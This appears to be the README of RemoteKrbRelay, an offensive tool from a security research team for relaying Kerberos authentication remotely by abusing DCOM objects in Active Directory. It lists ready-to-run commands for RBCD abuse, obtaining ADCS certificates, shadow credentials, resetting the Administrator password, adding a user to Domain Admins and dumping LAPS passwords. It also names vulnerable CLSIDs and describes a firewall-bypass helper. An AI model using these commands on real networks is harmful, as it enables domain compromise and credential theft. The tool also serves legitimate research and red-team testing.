
Remote Kerberos Relay made easy! Advanced Kerberos Relay Framework
/\_/\____,
,___/\_/\ \ ~ /
\ ~ \ ) XXX
XXX / /\_/\___,
\o-o/-o-o/ ~ /
) / \ XXX
_| / \ \_/
,-/ _ \_/ \
/ ( /____,__| )
( |_ ( ) \) _|
_/ _) \ \__/ (_
(,-(,(,(,/ \,),),)
CICADA8 Research Team
From Michael Zhmaylo (MzHmO)
You probably know KrbRelay and KrbRelayUp, but what if I told you it could be done remotely? With RemoteKrbRelay this becomes a reality.
Learn more about CertifiedDCOM here. CertifiedDCOM allows you to trigger an ADCS machine account:
# CertifiedDCOM (Abuse AD CS by setting RBCD)
.\RemoteKrbRelay.exe -rbcd -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -cn FAKEMACHINE$
# CertifiedDCOM (Abuse ADCS to get Machine cert)
.\RemoteKrbRelay.exe -adcs -template Machine -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
# CertifiedDCOM (Abuse ADCS with ShadowCreds)
.\RemoteKrbRelay.exe -shadowcred -victim adcs.root.apchi -target dc01.root.apchi -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -forceshadowcred
There's also the SilverPotato exploit. You can use it to abuse sessions. Including a domain administrator session on a third-party host.
# Change user password
.\RemoteKrbRelay.exe -chp -victim dc01.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -chpuser Administrator -chppass Lolkekcheb123! -secure
# Add user to group
.\RemoteKrbRelay.exe -addgroupmember -victim computer.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -group "Domain Admins" -groupuser petka
# Dump LAPS passwords
.\RemoteKrbRelay.exe -laps -victim mssql.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83
# Send LDAP Whoami request from relayed user
.\RemoteKrbRelay.exe -ldapwhoami -victim win10.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83
# Trigger authentication from another session
.\RemoteKrbRelay.exe -ldapwhoami -victim domainadminhost.root.apchi -target dc01.root.apchi -clsid f87b28f1-da9a-4f35-8ec0-800efcf26b83 -session 1
Now, you have four folders in front of you:
Checker - old version of the checker for detecting vulnerable DCOM objects;Checkerv2.0 - new version of the checker for detecting vulnerable DCOM objects;Exploit - RemoteKrbRelay.exe :)FindAvailablePort - a tool for bypassing a firewall when using an exploit.So, let's start with Checker. You can use it to detect vulnerable DCOM objects. A vulnerable DCOM object can be considered to be:
NT AUTHORITY\LOCAL SERVICE, since it uses empty creds to authenticate from the network;RemoteLaunch, RemoteActivation permissions. This is LaunchPermissions;RPC_C_IMP_LEVEL_IDENTIFY and higher. RPC_C_IMP_LEVEL_IDENTIFY is a default value;RemoteAccess permissions (or they should be emply). This is AccessPermission.For easy detection, you can use Checkerv2.0. It supports output in csv and xlsx formats.
PS A:\ssd\Share\RemoteKrbRelay\Checkerv2.0\Checkerv2.0\bin\Debug> .\Checkerv2.0.exe -h
/\_/\____, /\ /\
,___/\_/\ \ ~ / \ _____\
\ ~ \ ) XXX (_)-(_)
XXX / /\_/\___, Checkerv2.0 Collection
\o-o/-o-o/ ~ /
) / \ XXX
_| / \ \_/
,-/ _ \_/ \
/ ( /____,__| )
( |_ ( ) \) _|
_/ _) \ \__/ (_
(,-(,(,(,/ \,),),)
CICADA8 Research Team
From Michael Zhmaylo (MzHmO)
Check.exe
Small tool that allow you to find vulnerable DCOM applications
[OPTIONS]
-outfile : output filename
-outformat : output format. Accepted 'csv' and 'xlsx'
-showtable : show the xlsx table when it gets filled
-h/--help : shows this windows
Example:
.\Checkerv2.0.exe -outfile win10 -outformat xlsx
And u will receive such output:

The columns will contain the DCOM object CLSIDs, names, and LaunchPermission and AccessPermission.

Try searching for sppui (CLSID {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}, APPID {0868DC9B-D9A2-4f64-9362-133CEA201299}) and CertSrv Request (CLSID {d99e6e74-fc88-11d0-b498-00a0c90312f3}) objects and understand why they are vulnerable.
Don't use Checker, use only Checkerv2.0 pls :3
A small tool to discover a port on which to raise a malicious DCOM server. See details here (Remote -> Local Potato).

Practice using the concept of a local port. Rewrite RemotePotato0 to a local port. Trust me, this is useful.
I added quite a bit of different functionality to the exploit. Note that it provides enough functionality to abuse DCOM objects. I've also listed a few CLSIDs in Help for abuse. These CLSIDs were publicly known, there just wasn't a POC to abuse them. There are quite a few vulnerable DCOM objects, work with the checker and find them all!
PS A:\ssd\Share\RemoteKrbRelay\Exploit\RemoteKrbRelay\bin\x64\Debug> .\RemoteKrbRelay.exe -h
/\_/\____,
,___/\_/\ \ ~ /
\ ~ \ ) XXX
XXX / /\_/\___,
\o-o/-o-o/ ~ /
) / \ XXX
_| / \ \_/
,-/ _ \_/ \
/ ( /____,__| )
( |_ ( ) \) _|
_/ _) \ \__/ (_
(,-(,(,(,/ \,),),)
CICADA8 Research Team
From Michael Zhmaylo (MzHmO)
[HELP PANEL]
RemoteKrbRelay.exe
Relaying Remote Kerberos Auth by easy way
Usage: RemoteKrbRelay.exe [ATTACKS] [REQUIRED OPTIONS] [OPTIONAL PARAMS] [ATTACK OPTIONS] [SWITCHES]
[ATTACKS] (one required!)
-rbcd : relay to LDAP and setup RBCD
-adcs : relay to HTTP Web Enrollment and get certificate
-smb : relay to SMB
-shadowcred : relay to LDAP and setup Shadow Credentials
-chp : relay to LDAP and change user password
-addgroupmember : relay to LDAP and add user to group
-laps : relay to LDAP and extract LAPS passwords
-ldapwhoami : relay to LDAP and get info about relayed user